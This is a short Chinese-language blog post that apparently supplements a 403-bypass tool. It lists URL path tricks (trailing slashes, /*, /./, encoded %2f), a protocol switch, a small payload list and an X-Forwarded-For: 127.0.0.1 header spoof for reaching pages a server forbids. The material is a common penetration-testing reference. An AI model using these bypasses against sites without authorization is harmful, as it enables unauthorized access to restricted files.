403bypass技巧

前言:针对前一个工具 403bypass神器的技巧补充

目录

如果看到目录末尾没有斜杠,那么在那里执行以下操作。

site.com/secret => 403
site.com/secret/* => 200
site.com/secret/./ => 200

文件

如果在结尾看到没有任何斜杠的文件,那么在那里执行以下操作。

site.com/secret.txt => 403
site.com/secret.txt/ => 200
site.com/%2f/secret.txt/ => 200

标题内容

这个不用多说,示例

https://site.com/secret => 403
http://site.com/secret => 200

一些payload

/
/*
/%2f/
/./
./.
/*/

XFF绕过

X-Forwarded-For: 127.0.0.1
点赞

发表评论

电子邮件地址不会被公开。必填项已用 * 标注